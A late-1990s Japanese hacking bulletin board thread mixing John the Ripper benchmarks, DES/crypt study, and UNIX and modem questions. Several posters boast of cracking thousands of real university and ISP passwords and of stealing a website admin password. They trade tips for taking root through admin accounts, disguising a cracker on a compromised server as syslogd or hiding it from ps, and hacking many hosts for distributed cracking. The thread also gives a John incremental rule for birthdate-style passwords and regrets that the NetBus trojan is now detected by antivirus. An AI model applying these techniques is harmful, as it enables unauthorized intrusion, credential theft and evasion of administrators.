| 【メッセージ】 >WinのVC++だと多少差が出ます。 VC++ではレジスタは使えないんですね。Microsoft 固有の仕様(笑) サポートしてませんって書いてありました どうしてなんでしょ(??) LSI C-86ではvolatileと宣言しない場合は可能な限り レジスタを変数に割り当ててくれちゃいます。 (私が持ってる処理系はこのふたつだけなんです) ところで<arch.h>はどういう類のヘッダなのでしょうか? VC++のincludeディレクトリにはありませんが... |
| 【名 前】うにゅん 【タイトル】re:(3)ステルスとか・・ 12/22 10:53 |
unewn4th@usa.net |
| 【メッセージ】 >同じようなこといわれてspoofingのソースもらって読んだんですけど >よくわからないでしゅ(グスン) とりあえず、ステルススキャンからやってみては? phrack49のアレはいい教材ですよ。 rawソケットの基本なんかは、そこらの本に載ってますし。 ステルススキャンに関しては、一応テキストを書く予定ですので、 ちょっと待っててください(本業と副業の方がかなりキツくて...)。 |
| 【名 前】ロリロリ 【タイトル】re:(2)ステルスとか・・ 12/22 00:17 |
|
| 【メッセージ】 同じようなこといわれてspoofingのソースもらって読んだんですけど よくわからないでしゅ(グスン) サルでもわかるような解説ってどこかにないですかぁ? |
| 【名 前】うにゅん 【タイトル】re:(1)registerって? 12/22 00:13 |
unewn4th@usa.net |
| 【メッセージ】 >registerってどういう効果があるものなのでしょうか? おっしゃる通りの効果があります。 >少しも早くなったようには感じられないんですよね。 普通に使ってるなら、ベンチすれば差が出ると思います。 でも、オプティマイズが賢いと差が出ないかもしれません。 WinのVC++だと多少差が出ます。 >registerが多いとCPUの能率が落ちてしまうのでしょうか。 オプティマイズの仕方にもよりますが、普通は差が出ないこと はあっても落ちることはないと思います。 >johnのソースの中に"arch.h"をインクルードしているところがあったけど、 ただ単に、#ifdefとかで飛ばされちゃってるんじゃないでしょうか。 |
| 【名 前】Hariru 【タイトル】registerって? 12/21 23:47 |
hariru@ami.602.cc |
| 【メッセージ】 johnのソースを見ていて、 register int i; という行を見つけたのですが、registerってどういう効果があるものなのでしょうか? registerは、変数をCPUレジスタに割り当てて、効率よくアクセスできるようにするらしいのですが、 私の卒研のプログラムに組み込んでみても、少しも早くなったようには感じられないんですよね。 それとも、逆にregisterが多いとCPUの能率が落ちてしまうのでしょうか。 あるいはregisterにしても、たいして処理速度は変わらないということなのかな。 う〜ん。いまいちよくわからないので、誰かわかる人がいましたら教えてください。 そういえば、johnのソースの中に"arch.h"をインクルードしているところがあったけど、 私のマシンにそんなファイルはないんだよね。 どうして動くんでしょ。不思議です。 |
| 【名 前】Rorrim 【タイトル】早速のRESありがとうございます 12/21 16:46 |
49-hack@ijk.com |
| 【メッセージ】 皆さんありがとうございます。 とりあえず、Solarisでダイアルアップする時 ATZでの初期化が出来ずに(TimeOUTする)困ってましたので Windowsでの初期化コマンドを見てみたかっただけなんです。 なんだかSnifferな感じになっちゃいましたね。 すみませんでした。説明不足でした。 簡単に出来そうな「トオル」さんの案でいってみます。 |
| 【名 前】貝 【タイトル】re:(1)ステルスとか・・ 12/21 13:05 |
|
| 【メッセージ】 >ソケット通信でIPヘッダのアドレスやTCPヘッダのフラグを >いじったパケットを送るのってどうやるのでしょうか? rawソケットであーしてこーすればOKです。 spoofingとかsynfloodとかのソースを見れば大体わかると思う。 |
| 【名 前】ロリロリ 【タイトル】ステルスとか・・ 12/21 10:22 |
|
| 【メッセージ】 ソケット通信でIPヘッダのアドレスやTCPヘッダのフラグを いじったパケットを送るのってどうやるのでしょうか? |
| 【名 前】トオル 【タイトル】re:(1)モデムが〜 12/21 08:09 |
|
| 【メッセージ】 コントロールパネル → モデム → プロパティ → 接続 → 詳細 に「ログの記録」というのがありますが、どうでしょうか? |
| 【名 前】Rorrim 【タイトル】モデムが〜 12/21 03:04 |
49-hack@ijk.com |
| 【メッセージ】 誰か、モデムのログの取り方って知ってますか? Solarisなんかだと/etc/log/asppp.logに gdial(hayes)called Trying caller script 'hayes' from ' /etc/uucp/Dialers'. expect:("") got it ... って残るじゃないですか? これってWindowsじゃ見れないんですか? |
| 【名 前】night 【タイトル】う〜ん 12/19 23:55 |
|
| 【メッセージ】 久しぶりです すっかり話題についていけなくなってます 年末にまた来ます |
| 【名 前】うにゅん 【タイトル】re:(5)ただいま 12/19 08:04 |
unewn4th@usa.net |
| 【メッセージ】 >ネックになっているところはencryptを25回もするところですかね。 やっぱ、ここが一番ネックです。 計算自体は単純なので、Cで書いても結構オプティマイズされた オブジェクトが得られます。だからアセンブラで書いても意味ない ですしね。なんとかしたいものです。 >ところで、ゴエモンは"$1$"で始まるMD5には対応して >いないんですか? 現在は対応してないです。っていうか、まだ調べてないです。 |
| 【名 前】Hariru 【タイトル】re:(4)ただいま 12/19 06:52 |
hariru@ami.602.cc |
| 【メッセージ】 >最高速cryptの開発とか(笑) うひぃ〜。やっぱりそういう方向になるのね〜(笑) ちまっと調べたところによると、 ネックになっているところはencryptを25回もするところですかね。 何も25回もしなくても1回で充分なのに・・・という感じがします。 >当面cryptネタでお願いします〜 はあ〜い。ちょっと(いや、かなり)時間がかかると思いますが、調べてみます。 ところで、ゴエモンは"$1$"で始まるMD5には対応していないんですか? FreeBSDのMD5パスワードでやってみましたが、うまくいかないみたいです。 |
| 【名 前】うにゅん 【タイトル】re:(1)FreeBSD 2.2.7R で行きました... 12/18 07:46 |
unewn4th@usa.net |
| 【メッセージ】 >私が試してみたものはFreeBSD 2.2.7Rでした。 ウチもFreeBSDは調子悪いです。 Linuxはスンナリだったんですけどね... あと、大学でsolaris7(for Intel)入れようとしたんですけど、 マザーとの相性が悪いのか、No bootable devices have been found. とか出てアタマにきてます(殴) っつーことで、このマシンはWin専用機になりました〜 PenII450マシン買ってもらうんでのいいさ。 |
| 【名 前】うにゅん 【タイトル】re:(1)白木葉子 12/18 07:42 |
unewn4th@usa.net |
| 【メッセージ】 >私のPCで試したところNTでも動きました。 NT固有のモンは使ってないんで、大丈夫だと思ってましたけど... また、書き換えときます。 |
| 【名 前】うにゅん 【タイトル】re:(1)PC−UNIX 12/18 07:41 |
unewn4th@usa.net |
| 【メッセージ】 >まあ皆さん、気長に生きましょう。 元気出してね。shadowなんて世の中にはいくらでも... >卒論の逃避モードに入ってるRorrimでした。 私は、追い込ませモードに入ってます。 こっちも、それはそれでしんどいです。 |
| 【名 前】うにゅん 【タイトル】re:(3)ただいま 12/18 07:39 |
unewn4th@usa.net |
| 【メッセージ】 >ココの「暗号関連係」っていうのがちょっとよくわかりませんでした。 最高速cryptの開発とか(笑) 当面cryptネタでお願いします〜 |
| 【名 前】うにゅん 【タイトル】re:(1)絶対解きたいとき・・・・・・ 12/18 07:37 |
unewn4th@usa.net |
| 【メッセージ】 >一つ一つ総当たりして欲しい場合はどうすればいいのでしょうか? >どなたか、教えてください。 クラックしないと命がないっていう場合は、かたっぱしからUNIX をハックして、かたっぱしからインクリ分散やってクラックする しかないでしょね。数千台やれば希望が持てるかもしれません。 |
| 【名 前】int ZER0 【タイトル】FreeBSD 2.2.7R で行きました... 12/17 22:26 |
intzer0@usa.net |
| 【メッセージ】 レスありがとうございます>layer13、DarkXの両氏 私が試してみたものはFreeBSD 2.2.7Rでした。 (UNIX USER '98 11月号のヤツです) でも、IDEはセカンダリどころか プライマリすらも認識してくれませんでした。(涙) ベースクロックを上げるためにマザーボードのパターンカットをやってから 何故かDOSで二台目以降を認識してもらえなくなったりと、なんかへんです (一台目は問題なく認識して動いていますが...) ということでPlamo linuxを試してみることにします。 情報ありがとうございます。 PlamoってkazutさんのところのBBSでも話題が出ていましたね。 |
| 【名 前】cigarette man 【タイトル】白木葉子 12/17 18:44 |
smoker@24h.co.jp |
| 【メッセージ】 白木葉子for win32ですがNTは試してない、とのこと でしたので、私のPCで試したところNTでも動きまし た。 |
| 【名 前】Rorrim 【タイトル】PC−UNIX 12/17 16:37 |
49-hack@ijk.com |
| 【メッセージ】 私は、PC−Solaris7でしゅ。 しかし、モデムの設定って言うかPPPのConfigが上手く行きません。 まあ皆さん、気長に生きましょう。 卒論の逃避モードに入ってるRorrimでした。 |
| 【名 前】DarkX 【タイトル】こんにちわ! 12/17 15:17 |
|
| 【メッセージ】 こんにちわ!お久しぶりです。この前、2万人のpassをクラックしているDarkXです。 実はjohnを】kazutさんの言うとうり1.4に変えたところ ルールを簡単につくれました。 おかげで無事18657人分のpassをクラックできました。あとは 根っこと難解なpassを残すだけです。 で、思ったのですが、どうも根っこのpassは 大文字、小文字の混ざった意味なしの(単語じゃない) 文字列のようです。これはまともに解読したら本当に100万年かかりそうなのでやめました(笑) ですので、普通のユーザから根っこをのっとる計画に変えました。 がんばるぞ〜 >私もPC-UNIXインストしたいよ〜 >(FreeBSD(98)入れようとしたんですが...) >どうしてIDEハードディスクを認識してくれないのぉ〜(泣き) これは 多分FreeBSDのバージョンが古いためだと思われます。たしか 2.2.2以前のバージョン は 2台目以降の(つまりプライマリの)ハードディスクにいれるのは難しいとありました。 最新のBSDはHD系統の問題はかなり解決したのでそれを使ってはどうですか? ただ 書籍(**徹底入門など)のCD−ROMでは かなり古いバージョンしか入っていないので止めた ほうがいいかとおもわれます。 ただいまのPC98の最新バージョンは2.2.7です。(もうすぐ3.0がでそうですが・・) 多分、最新のバージョンが出たら UNIX関係の雑誌に付録としてCD−ROMに入るでしょう。 それとも、linux98を使うという手もありますよ。 確か、12/25販売の DOS/V 何とかという雑誌に Plamo linuxとして ついてくるそうです。 ちなみに私はlinux98です。 |
| 【名 前】layer13 【タイトル】Re:独り言 12/17 12:59 |
layer13@curio-city.com |
| 【メッセージ】 >私もPC-UNIXインストしたいよ〜 >(FreeBSD(98)入れようとしたんですが...) >どうしてIDEハードディスクを認識してくれないのぉ〜(泣き) 物はPC-9821V12ですか。私はPC-9821Xe10(486マシン)に FreeBSD入れて使ってます。で、IDEの認識ですが、私の場合は プライマリのマスターしか認識してくれません。 ということで、Aドライブ(要するにプライマリのマスター) の後ろの部分をBSDの領域に変換して使っています。 BSDのバージョンには疎いのですが、未だに セカンダリは認識してくれないのでしょうか? 最近の悲しいこと。 NetBus1.7がNortonAntiVirusに見つかるようになりました。 12月7日版の定義ファイルからです。ちっ。せっかくBOから 乗り換えたのに。 ということで、ここでもらったxtcpを改造中です。 でも、時間が無くてなかなか進まないっス。 |
| 【名 前】Hariru 【タイトル】re:(2)ただいま 12/17 06:30 |
hariru@ami.602.cc |
| 【メッセージ】 >っていうか、ココの「暗号関連係」っていうことで、お願いします(笑) う〜ん。しばらく考えていましたが、 ココの「暗号関連係」っていうのがちょっとよくわかりませんでした。 DES関連のことですか?それともcrypt関連のことですか? とりあえず今は、Packet Storm Securityでcryptをあさっています。 でもここって英語圏・・・ うう、英語もすらすら読めるようになりたいよ〜。 |
| 【名 前】MARIA 【タイトル】DLさせて頂きました 12/17 04:52 |
|
| 【メッセージ】 悪用はしません これからも実用的なツール待ってます。 |
| 【名 前】MARIA 【タイトル】DLさせて頂きました 12/17 04:50 |
|
| 【メッセージ】 悪用はしません これからも実用的なツール待ってます。 |
| 【名 前】int ZER0 【タイトル】re:(2)John for DOS 12/17 03:32 |
intzer0@usa.net |
| 【メッセージ】 >DOS版とWin版をそれぞれDOS窓で動かした時に、 >DOS版の方が2秒とはいえ早いのはなぜでしょう? 下にも書きましたが誤差の範囲内です。(^^; 測定結果が6時間くらいになるようにして実験すれば (これは、私はやってみるつもりはありませんが...) おそらく差はでないと思います。 >(DOS用って8086コードですよね?) DOS用も386コードで記述してると私は思っていたのですが (根拠はありません。ただなんとなく...) 実際のところどうなのでしょう? さらに高速化が可能だとしたら もっと検証してみるのもいいかもしれませんね (私はデータ取るだけ取ってここまで考えてませんでした) 独り言: 私もPC-UNIXインストしたいよ〜 (FreeBSD(98)入れようとしたんですが...) どうしてIDEハードディスクを認識してくれないのぉ〜(泣き) |
| 【名 前】cha_OS 【タイトル】絶対解きたいとき・・・・・・ 12/17 00:56 |
cha_os@mail.goo.ne.jp |
| 【メッセージ】 ども、くだらない質問ですが・・・・・ 絶対解きたいパスワードがある時、皆さんはどうしてますか? ”ごえもん”を使う場合を考えてくれると嬉しいんですが・・・・ 時間は幾らかかっても構わないんです。 対象は無作為に付けられたパスワードという設定なので 辞書を使わない・・・というか、きっとあてにならないので・・・・ 一つ一つ総当たりして欲しい場合はどうすればいいのでしょうか? どなたか、教えてください。 |
| 【名 前】うにゅん 【タイトル】re:(1)John for DOS 12/16 23:10 |
unewn4th@usa.net |
| 【メッセージ】 >生のDOSで走らせればDOS版の方が速いことが >これでいえると思います。 マジですか? DOS窓vs生DOSだと、生DOSが早いのはWinの裏方の問題として納得 いきますけど、DOS版とWin版をそれぞれDOS窓で動かした時に、 DOS版の方が2秒とはいえ早いのはなぜでしょう? (DOS用って8086コードですよね?) それって、常識的に考えるとjohnの386コードの方の作り方が マズイとしか考えられないですよね。 cryptは32bit命令を使えた方が断然有利ですから。 crypt部はアセンブラなので、ココの386コードの設計がまずい 可能性があると思いますけど、Cの部分をコンパイルしたときの オプティマイズがまずいってことも考えられますね。 それか、タスク処理の関係上ってことかな... (DOS版の方がCPU負荷が高くなるとか) for winはNT専用ってことになりますか。遅いけど。 原因究明して386コードでDOS版に移植すれば、かなり高速化 できるんじゃないでしょうか。 |
| 【名 前】int ZER0 【タイトル】John for DOS 12/16 20:07 |
intzer0@usa.net |
| 【メッセージ】 >Dosだとどうなんでしょう。まだ試した事ないんですが。 私の環境で試してみました。(PC-9821V12(改) ) johnのバージョンは1.6で、1000個のPASSを single modeでクラックしました。 結果:要した時間(分:秒)/ 速度比 John for Win32 5:07 / 1.00 John for DOS window表示 5:05 / 1.00 John for DOS fullscreen表示 4:40 / 1.09 John for DOS 生のDOS 4:00 / 1.28 DOS版のJohnの結果は1〜2秒程ずれている可能性があります。 ウチのマシンではタイマが進まなくて (ハードウェア割り込みの関係でしょうか?) time: 0:00:00:00 100% c/s: 5048309(!) こんな表示になるために時計で計ったためです。 早くデータを取るためにサンプルを小さくして実験しましたが、 生のDOSで走らせればDOS版の方が速いことが これでいえると思います。 |
| 【名 前】うにゅん 【タイトル】re:(1)クイズ for UNIX USER 12/16 19:11 |
unewn4th@usa.net |
| 【メッセージ】 > 問1 以下の名前のファイルを作りなさい。 > 問2 以下のファイルのみ削除しなさい。 Cで書いたら一瞬ですねー。 でも、shellでもわりとアッサリできました。 |
| 【名 前】うにゅん 【タイトル】re:(1)石川五右衛門 12/16 19:08 |
unewn4th@usa.net |
| 【メッセージ】 すいません、今ちょ〜っと忙しくて、バージョンアップが 遅れてます(年末ですからね、いろいろと)。 もう少し待ってくださいね。 |
| 【名 前】SideWalk 【タイトル】クイズ for UNIX USER 12/16 18:48 |
|
| 【メッセージ】 問1 以下の名前のファイルを作りなさい。 -rw-r--r-- 1 user group 1 Dec 16 17:57 abc def -rw-r--r-- 1 user group 1 Dec 16 17:57 -abc 問2 以下のファイルのみ削除しなさい。 -rw-r--r-- 1 user group 1 Dec 16 17:57 -abc 私、これハマりました(笑)。 すいません、ゴミでーす。 |
| 【名 前】cigarette man 【タイトル】石川五右衛門 12/15 14:00 |
smoker@24h.co.jp |
| 【メッセージ】 石川五右衛門ってまだ一般配布されてないんですよね、、 ほしい、、 |
| 【名 前】うにゅん 【タイトル】re:(1)ただいま 12/15 08:27 |
unewn4th@usa.net |
| 【メッセージ】 >とりあえずDESの方は終わったので、つぎは本題のcrypt()ですか。 そうですね、お願いします。 っていうか、ココの「暗号関連係」っていうことで、お願いします(笑) >ただ、プログラムからDocにまとめるって結構大変そうです。 どうですか、これを期にCの方も勉強するっていうことで... 一石二鳥ですよ〜 |
| 【名 前】うにゅん 【タイトル】re:(1)john UNIX版について 12/15 08:23 |
unewn4th@usa.net |
| 【メッセージ】 >Win-37分 >Linux-28分 >でした。(同じマシン上です) あら、そうなんですか。 私はwinでほとんどやったことないので知りませんでした。 でも、これだけ差があるのは、何ででしょうね。 基本的にCコードは似たような物ですし... コンパイラのオプティマイズ の問題か、OSの問題か...謎ですね。 >Dosだとどうなんでしょう。まだ試した事ないんですが。 スピードは落ちると思います。 基本的に、Winのjohnは386コードを使って高速化してますけど、 DOSは8086コードなんで。いくら、シングルタスクといえども、 やっぱりスピードは落ちるでしょう。 WinでDOS版を動かすと、間違いなく落ちると思います。 (試してませんけどね) |
| 【名 前】うにゅん 【タイトル】re:(1)インクリについて 12/15 08:16 |
unewn4th@usa.net |
| 【メッセージ】 >ということは、辞書に載っていなくてインクリで一番最後に >なりそうな「ZZZZZZZY」なんてパスが一番インクリに強かったり >するのかな? う〜ん、辞書にZZZZZZZなんかはありそうなんで、チョロっと ルールをいじくってたらhitするかも(笑) その辺を考えてみると、インクリでhitしにくい(もともとhitしに くいけど)パスを考えてみるのもいいかもしれませんねー。 |
| 【名 前】Hariru 【タイトル】ただいま 12/15 06:48 |
hariru@ami.602.cc |
| 【メッセージ】 おおっ。本当に私の書いたドキュメントがUPされている〜 初めてのカキコに、レスが付いた時ぐらい感動しますね。 場所を提供してくださいまして、本当にありがとうございます。>うにゅんさん >やっぱ、工学部系ですかね〜 お察しの通り工学系です。 やはりわかりますよね。あんな堅苦しい文章を書くんですから(笑) とりあえずDESの方は終わったので、つぎは本題のcrypt()ですか。 ソースの方をチラリと見てみましたけど、DESと大きな変化はなさそうというのが感想ですね。 ただ、プログラムからDocにまとめるって結構大変そうです。 っていうか、私がCの勉強をおろそかにしているのというのが原因なんですけどね(笑) もうちょっとCの勉強します。 |
| 【名 前】f00000 【タイトル】john UNIX版について 12/14 12:13 |
explorer.exe@ijk.comhttp://members.tripod.com/~f00000 |
| 【メッセージ】 johnてWinよりもUNIX(Linux)上で動かす方が断ぜん早いですね。 シングルモードで1000人ぶんやって Win-37分 Linux-28分 でした。(同じマシン上です) 当たり前の結果なのかもしれませんが。 Dosだとどうなんでしょう。まだ試した事ないんですが。 ところでホームページ作ってみました。 http://members.tripod.com/~f00000 といってもまだ工事中でLinkには何もありません。 Toolにjohn1.4とかあります。 |
| 【名 前】layer13 【タイトル】インクリについて 12/14 10:32 |
layer13@curio-city.com |
| 【メッセージ】 >私は「WinsockによるWindowsネットワークプログラミング」 >(アスキー出版局)を参考にしてますけど うにゅんさんありがとうございます。とりあえず、書店に 行ってみます。 で、インクリの話題を見ていてふと思ったのですが、 大抵インクリやる場合は、アルファベットや数字を若い方から順に 入れると思うんですよ。 ということは、辞書に載っていなくてインクリで一番最後に なりそうな「ZZZZZZZY」なんてパスが一番インクリに強かったり するのかな? そんな投げやりなパスは却下でしょうか? |
| 【名 前】kazut 【タイトル】re:(1)!! 12/13 22:14 |
http://members.xoom.com/k2japan/ |
| 【メッセージ】 >そこでお聞きしたいのですが Jhonのインクリのルールの書き方を教えてもらえませんか? ver1.4だとインクリルール作りやすくて楽ですよ 他のは良くわかんないです(^^;; [Incremental:A6] CharCount = 36 MinLen = 7 MaxLen = 7 Charset71 = abcdefghijklmnopqrstuvwxyz Charset72 = 0123456789 Charset73 = 0123456789 Charset74 = 0123456789 Charset75 = 0123456789 Charset76 = 0123456789 Charset77 = 0123456789 数字,アルファベットは適当に変えてみてください |
| 【名 前】トオル 【タイトル】みっしょんこんぷり〜と 12/13 07:59 |
|
| 【メッセージ】 おはようございます。 ボーッと読んでいたのでいきなり呼ばれてハッとしました(笑) とってもわかりやすかったです。勉強になりました。 有り難うございました。>Hariruさん |
| 【名 前】ネット初心者 【タイトル】re:(2)初めまして 12/12 23:26 |
|
| 【メッセージ】 レスありがとうございます。 やりかたは分かりませんが、 そのような芸当もやろうと思えば 出きるのですね。 どうもありがとうございました |
| 【名 前】K00L 【タイトル】私信 12/12 22:04 |
webmaster@backsection.office.ne.jphttp://BASE.OC.TO |
| 【メッセージ】 >うにゅん師 業務連絡があります。 例のBBSへお越しください。 |
| 【名 前】うにゅん 【タイトル】re:(1)メール読みました 12/12 09:40 |
unewn4th@usa.net |
| 【メッセージ】 >でも、私もRorrimさんと同じく、卒研が追い込みモードに移行中ですので、 あ、やっぱし学生なのね... 私もですけど。 やっぱ、工学部系ですかね〜 がんばってくださいませ。 「DES暗号化アルゴリズム詳細」をPenguinDocumentに追加しました。 トオルさん、oc.toの方にもアップお願いしますね〜 |
| 【名 前】うにゅん 【タイトル】re:(1)はじめまして。 12/12 09:09 |
unewn4h@usa.net |
| 【メッセージ】 >Winsockというか、Windows >のネットワーク周りのAPIが解りません。書籍で良いものがあれば、 >教えていただきたいです。 Winsock関連は、何冊かありますよ。 私は「WinsockによるWindowsネットワークプログラミング」 (アスキー出版局)を参考にしてますけど。 >訳したものを作者に無断で公表するとやっぱまずいんですかね? ダメって書いてなきゃいいんじゃないでしょうか。 |
| 【名 前】うにゅん 【タイトル】re:(1)初めまして 12/12 08:58 |
unewn4th@usa.net |
| 【メッセージ】 >特定のIPを持った人間が、ある特定のURLにwwwでアクセス >するときに、特定のページを表示させるなどということは >可能なのでしょうか? 可能ですけど... そんなことやっても、あまり意味ないですからねぇ... |
| 【名 前】アノニ 【タイトル】re:(1)初めまして 12/12 06:42 |
|
| 【メッセージ】 あくまで推測ですが、管理用パスの書き換えに気づいた管理者が、 鯖内のファイルが書き換えられてる可能性も考えて、 全ファイル消去&UPしなおし中だったとか・・・。 |
| 【名 前】ネット初心者 【タイトル】初めまして 12/12 04:42 |
|
| 【メッセージ】 はじめまして。 いきなり教えて君ですみません。 しかもハックと関係ないかもしれません。 気を悪くされましたら、即削除してください。 不思議な現象に遭ったのですが、初心者なのでよく分かりません。 特定のIPを持った人間が、ある特定のURLにwwwでアクセス するときに、特定のページを表示させるなどということは 可能なのでしょうか? 具体的にいいますと、私があるHPの管理用パスをとり、 書き換えたところ、一時の後、私がジオにアクセスしようとすると、 必ずそのHPのあったサーバーの、ファイルがないとのエラーが出て、 一旦電話回線を切ると直りました。現象の発生はそのHPの 管理者が異変に気づいた後なので、意図的にされた気がしてなりません 使用環境は98とIEです。 そんな意味不明な攻撃方法などあるのでしょうか? それともたまたまPCの調子が悪かったのでしょうか? |
| 【名 前】RuRu 【タイトル】そういえば 12/11 23:57 |
|
| 【メッセージ】 某大学のユーザー30000から2000ほど任意抽出して石川五右衛門のテストに利用しましたが 約3%というあまりのJoe(ID=PASSWORD)の多さに閉口した覚えがあります。 そのくせ辞書では殆ど当たらないんだから・・・ はじめから英字+数字の組み合わせのID渡すとJoeになる率が上がるのかな? |
| 【名 前】layer13 【タイトル】はじめまして。 12/11 18:39 |
layer13@curio-city.com |
| 【メッセージ】 ドキュメントとツール類DLさせてもらいました。 とくに、XTCPのソース大変参考になりました。で、XTCPを 自分で拡張してみたいと思うのですが、Winsockというか、Windows のネットワーク周りのAPIが解りません。書籍で良いものがあれば、 教えていただきたいです。 >DarkXさん Dos用のJohnですが、うちの98では元気に動いてます。ちなみに、 486マシンをAMDの5x86に載せ変えたものです。 あと、いまNetBusのマニュアルを和訳しているんですが、 訳したものを作者に無断で公表するとやっぱまずいんですかね? |
| 【名 前】Rorrim 【タイトル】Kazutさんモード突入? 12/11 17:47 |
49-hack@ijk.com |
| 【メッセージ】 >DarkXさん うーん、Kazutさんとこに行ってみた? ここのリンクから行けるよ。 Johnに関しては彼が一番でしょうし、 そこの掲示板に書いてみたら? John1.6 BenchMarkResults Tested by NT-workstation CPU Pentium-2 400MHz MEMORY 196MB (normal-john) Benchmarking: Standard DES [24/32 4K]... DONE Many salts: ン44199 c/s Only one salt: レ40748 c/s Benchmarking: BSDI DES (x725) [24/32 4K]... DONE Many salts: b1505 c/s Only one salt: キ1320 c/s Benchmarking: FreeBSD MD5 [32/32]... DONE Raw: 78 c/s Benchmarking: OpenBSD Blowfish (x32) [32/32]... DONE Raw: }58.0 c/s Benchmarking: Kerberos AFS DES [24/32 4K]... DONE Short: 0352 c/s Long: H98929 c/s Benchmarking: NT LM DES [24/32 4K]... DONE Raw: |
| 【名 前】Hariru 【タイトル】メール読みました 12/11 16:25 |
hariru@ami.602.cc |
| 【メッセージ】 メールありがとうございました。 私のような者にアカウント、並びにメンバーのお誘いとは感激です。 お誘いはおっけーですよ。 でも、私もRorrimさんと同じく、卒研が追い込みモードに移行中ですので、 あまり手伝えないかも知れませんので、ご了承くださいね。 メールより一部転記 >このドキュメントは、初心者にもある程度読める内容 >に仕上がってると思います。 私自身初心者なので、初心者の方にもわかりやすくなっているのでしょう(笑) でも、このドキュメントを書き終わってほんの少しのスキルアップにもなりましたので、 これを期に脱初心者を目指そうかな〜。 PS. ちょっとお家の諸事情で、2,3日アクセスできないかも知れませんが、 今後ともよろしくお願いします。 |
| 【名 前】DarkX 【タイトル】!! 12/11 14:35 |
|
| 【メッセージ】 何とpassのほとんどにルールがあることを発見しました。 そのルールとは 最初に アルファベットが一文字+数字が6桁と言うものです。 こいつはどうも 生年月日のようです。その証拠に適当に有りそうな生年月日を辞書に 入れてJohnにかけてやると10〜20位ヒットします。 そこでお聞きしたいのですが Jhonのインクリのルールの書き方を教えてもらえませんか? もしくは 分かりやすく書いてあるサイトを教えてもらえませんか? どうも概存の文書ではよく分かりませんので・・ よろしくお願いします。 |
| 【名 前】K00L 【タイトル】なんだかなぁ 12/11 14:02 |
webmaster@backsection.office.ne.jphttp://BASE.OC.TO |
| 【メッセージ】 >うにゅん師 メールサーバーがまた調子悪いみたいです。 もう少しお待ちください。 外部SMTPによっては帰ってきちゃうんです。 おかしいなぁ・・ |
| 【名 前】うにゅん 【タイトル】re:(1)かんせい 12/11 13:00 |
unewn4th@usa.net |
| 【メッセージ】 >DES暗号化アルゴリズムの詳細を書いたドキュメントができあがりましたので、 >メールで送らせてもらいました。 ありがとうございます。お疲れ様でした。 今、一通り、目を通しました。 家に帰って、じっくり読ませて頂きます。明日にはアップします。 DESに興味のあるみなさん、コレはマジでいいですよ。 すごい分かりやすいし、ツボをちゃんと押さえてます。 これがあると、その辺の分かりにくいDocや文献を読む 必要はないですね。 Hariruさん、メールしました。 読んでくださいね〜 |
| 【名 前】Hariru 【タイトル】かんせい 12/11 08:00 |
hariru@ami.602.cc |
| 【メッセージ】 うにゅんさんへ DES暗号化アルゴリズムの詳細を書いたドキュメントができあがりましたので、 メールで送らせてもらいました。 一応、レイアウトなどうにゅんさんのHPにあるドキュメントに似せて作りましたが、 気に入らなければごっそり変えていただいても結構ですので、 後はよろしくお願いしますね。 DarkXさんへ >どっかに windows ro unix版は ないですか?>Jhon ちょっと前に、Rorrimさんがこの掲示板で紹介されましたよ。johnの新バージョン。 一応アドレスはこっちです。 http://www.false.com/security/john/ |
| 【名 前】うにゅん 【タイトル】re:(3)でも 12/11 04:07 |
unewn4th@usa.net |
| 【メッセージ】 >根っこ盗れたのは、自分の大学だけですからね(笑) 私もパスクラックでroot盗れたのはないです。 でも、rootじゃなくてもadminのパスを盗れれば、簡単に rootになれる場合が多いので、その辺から当たってみる 方が可能性は高いです。rootはぐちゃぐちゃパスでも adminのはそうでもない場合が多いですからね。 sulogは、たいがいrootじゃないと見れないですけど、 lastとかで大体誰がadminなのかは分かりますし。 |
| 【名 前】うにゅん 【タイトル】re:(3)でも 12/11 03:58 |
unewn4th@usa.net |
| 【メッセージ】 >大変申し訳ありませんが、1〜2ヶ月ほど休ませてください。 そりゃ、仕方ないですね。2ヶ月たったらお願いしますね〜 >MathMaticaが難しいんです(謎) たしかに(笑) |
| 【名 前】Rorrim 【タイトル】re:(2)でも 12/11 02:06 |
49-hack@ijk.com |
| 【メッセージ】 >john -i -users:root passwd そうですね〜 根っこ狙いなら、私もこれですね〜 私は12000(ISPと大学関係)のPassをクラックしてますが 根っこ盗れたのは、自分の大学だけですからね(笑) それはそうと、うにゅんさんへ 卒論がまじで忙しくてTeXT書く暇がありません。 大変申し訳ありませんが、1〜2ヶ月ほど休ませてください。 MathMaticaが難しいんです(謎) |
| 【名 前】White_E 【タイトル】re:(1)でも 12/11 01:21 |
|
| 【メッセージ】 DarkX氏、初めまして。 john -i -users:root passwd に関しては以前こんな駄文を書いてみたので暇な時にでも御一読下さい。 http://www.geocities.com/Area51/Orion/3601/imode.html 取り敢えずは手に入る限りの辞書を集めてそれらで解析を試みてはどうでしょうか。 |
| 【名 前】うにゅん 【タイトル】re:(1)hehehe 12/10 22:15 |
unewn4th@usa.net |
| 【メッセージ】 >psで一発じゃないかな(笑) psをいじってないと、おもいっきり出ちゃいますからね(笑) せめて、引数はプログラムに埋めて、johnじゃなくsyslogdとか に名前を変えとくのは基本ですかね。 psをmodifyすると見つかりにくいですけど。 あ、でもjohnなんて動かしたら、ps改してても重いので絶対怪しまれ てrebootかけられちゃうでしょうね。 でもrootインクリは、かなり博打なんで、危険な思いをしてまで UNIX鯖で動かすのもどうかと思いますけど... UNIX版は、そこらへんに転がってます。あと、DOS版のjohnって 98じゃ動かないんですか?標準システムコールしか使ってなかった ような気がしますけど(だったら動く)。もしダメでもソースを 際コンパイルするとおそらく動きますよ。 |
| 【名 前】うにゅん 【タイトル】re:(1)いいなあ 12/10 22:04 |
unewn4th@usa.net |
| 【メッセージ】 >Fortuneの広告攻撃って、いったいどんな攻撃なのでしょう。 >SPAMメールみたいなものなのでしょうか? htmlの先頭に、勝手に(でもないか...)広告を引っ付けられる んですよー。まぁ、仕方ないですけどね。でも、あらためて 見ると、やっぱイヤですね〜。 |
| 【名 前】K00L 【タイトル】hehehe 12/10 20:04 |
|
| 【メッセージ】 >だったらroot関係の行以外をpasswdファイルからはぶいたらどうなんですかねぇ ん〜・・ 結局rootのパスが無作為な配列だったら100万年かかるわけで・・(笑) >サーバにこっそり仕掛けて稼動させとくとか >う〜ん さすがにばれるよなぁ(笑) psで一発じゃないかな(笑) |
| 【名 前】DarkX 【タイトル】でも 12/10 15:43 |
|
